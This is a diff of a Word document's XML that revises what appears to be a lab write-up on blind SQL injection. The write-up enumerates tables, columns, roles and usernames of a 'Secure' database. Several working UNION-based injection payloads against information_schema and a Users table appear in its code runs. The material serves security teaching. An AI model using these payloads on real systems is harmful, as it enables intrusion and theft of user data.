+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>I</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>n b), we try to find the second table name of “Secure”. To do that, we can add a</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>nother</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> condition to only match table name</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> which </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>are</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> not “testing”. This gives us the second table name “Trainings”.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>Next in c), we can get the third table name “Users” by guessing table name</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>s</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> which </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>are</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> not either “testing” or “Trainings”.</w:t>
+            </w:r>
+          </w:p>
+          <w:p>
+            <w:pPr>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:hint="eastAsia"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>W</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>e can repeat th</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>e</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">se </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">steps to get the fourth table name </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>but</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> we found that no character in the candidate charset satisfies the first character of the fourth table</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> so</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">there </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>might be only</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> three tables in “Secure</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>”</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
@@ -13188,104 +12349,27 @@
             </w:pPr>
             <w:r>
               <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>I</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>n b), we try to find the second table name of “Secure”. To do that, we can simply add a condition to only match table name</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> which is not “testing”. This gives us the second table name “Trainings”.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Next in c), we can get the third table name “Users” by guessing table name</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>s</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> which is not either “testing” or “Trainings”.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:hint="eastAsia"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>W</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>e can repeat the above steps to get the fourth table name and we found that no character in the candidate charset satisfies the first character of the fourth table</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> so we know there are three tables in “Secure” in total.</w:t>
-            </w:r>
-          </w:p>
-          <w:p>
-            <w:pPr>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-            </w:pPr>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">It might be the case that we ran out the candidate characters as mentioned in step 2 </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>but</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> we </w:t>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>However, i</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t>t might be the case that we ran out the candidate characters as mentioned in step 2</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">. Here </w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve">we </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13343,9 +12427,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13353,9 +12436,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>column_name</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13363,9 +12445,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t xml:space="preserve"> from </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13373,9 +12454,26 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
+              <w:t>information_schema.columns where table_name='Users'</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
+              <w:t xml:space="preserve"> having substr(</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
+                <w:sz w:val="18"/>
+                <w:szCs w:val="18"/>
+                <w:lang w:eastAsia="zh-CN"/>
+              </w:rPr>
               <w:t>column_name</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13383,9 +12481,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>,1,</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13393,9 +12490,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>3</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13403,9 +12499,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13413,94 +12508,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>='Users'</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>,1,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>3</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>)=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:t>api</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13533,147 +12542,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>information_schema.columns</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> where </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>table_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">='Users' having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">(column_name,1,2)=BINARY 'id' and </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>column_name</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>&lt;&gt;'</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, column_name from information_schema.columns where table_name='Users' having substr(column_name,1,2)=BINARY 'id' and column_name&lt;&gt;'api' limit 1 --+</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -13760,21 +12629,7 @@
               <w:rPr>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>"</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>api</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>", "id", "password", "probation", "</w:t>
+              <w:t>"api", "id", "password", "probation", "</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13884,9 +12739,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
+              <w:t xml:space="preserve">' union select NULL,NULL, </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13894,9 +12748,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t>roles</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -13904,7 +12757,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">, </w:t>
+              <w:t xml:space="preserve"> from </w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13913,7 +12766,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>roles</w:t>
+              <w:t>Users</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -13922,45 +12775,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from </w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>Users</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve"> having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(</w:t>
+              <w:t xml:space="preserve"> having substr(</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14040,47 +12855,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="gramStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>NULL,NULL</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t xml:space="preserve">, roles from Users having </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
+              <w:t>' union select NULL,NULL, roles from Users having substr(roles,1,8)=BINARY 'HR admin' and roles&lt;&gt;'user' limit 1 --+</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -14239,10 +13014,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve">' union select </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:proofErr w:type="gramStart"/>
+              <w:t>' union select NULL,roles,username from Users having</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14250,9 +13023,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>NULL,roles</w:t>
-            </w:r>
-            <w:proofErr w:type="gramEnd"/>
+              <w:t xml:space="preserve"> </w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14260,9 +13032,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>,username</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
+              <w:t>substr(username,1,</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14270,7 +13041,7 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> from Users having</w:t>
+              <w:t>10</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -14279,9 +13050,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t xml:space="preserve"> </w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
+              <w:t>)=BINARY '</w:t>
+            </w:r>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14289,47 +13059,8 @@
                 <w:szCs w:val="18"/>
                 <w:lang w:eastAsia="zh-CN"/>
               </w:rPr>
-              <w:t>substr</w:t>
-            </w:r>
-            <w:proofErr w:type="spellEnd"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>(username,1,</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>10</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
-              <w:t>)=BINARY '</w:t>
-            </w:r>
-            <w:proofErr w:type="spellStart"/>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
-                <w:sz w:val="18"/>
-                <w:szCs w:val="18"/>
-                <w:lang w:eastAsia="zh-CN"/>
-              </w:rPr>
               <w:t>prodigysml</w:t>
             </w:r>
-            <w:proofErr w:type="spellEnd"/>
             <w:r>
               <w:rPr>
                 <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Courier New"/>
@@ -14408,10 +13139,8 @@
                 <w:szCs w:val="18"/>
